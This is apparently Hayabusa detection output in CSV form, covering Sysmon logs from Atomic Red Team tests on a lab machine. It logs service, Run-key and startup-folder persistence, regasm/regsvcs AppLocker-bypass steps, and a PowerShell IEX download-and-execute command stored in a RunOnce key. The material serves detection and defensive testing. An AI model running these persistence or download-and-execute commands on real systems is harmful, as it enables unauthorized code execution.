+2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,../hayabusa-rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,../hayabusa-rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
